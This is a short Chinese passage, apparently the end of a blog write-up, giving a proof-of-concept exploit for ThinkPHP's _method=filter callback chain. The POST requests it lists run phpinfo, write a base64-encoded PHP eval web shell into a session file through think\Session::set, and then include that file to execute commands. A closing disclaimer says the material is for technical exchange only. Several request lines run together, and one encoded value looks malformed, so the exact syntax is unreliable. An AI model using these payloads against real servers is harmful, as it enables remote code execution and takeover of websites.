因此布局POC如下
post : 0=error_reporting&1=phpinfo&_method=filter
filter链为
POST->error_reporting->phpinfo->输出信息
成功实行phpinfo
POST/index.php?a=PD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2MnXSkpOyA/Pg==0=base64_decode&1=think\Session::set&2=error_reporting&_method=filter
filter链为
输入数据->bases64_decode->think\Session::set->写入session
成功写入
POST /index.phpCookie: POST=session文件名0=\think\Cookie::get&1=think\__include_file&2=error_reporting&_method=filter&c=cGhwaW5mbytgpOw==
成功实行命令

POST/index.php?a=C:/phpstudy_pro/Extensions/tmp/tmp/sess_v6mip0bjhb29prtsiv69f12j931=think\__include_file&2=error_reporting&_method=filter&c=cGhwaW5mbygpOw==
申明:本文仅供技能互换,请自觉遵守网络安全干系法律法规,切勿利用文章内的干系技能从事造孽活动,如因此产生的统统不良后果与文章作者无关 本文原创作者:yukidddd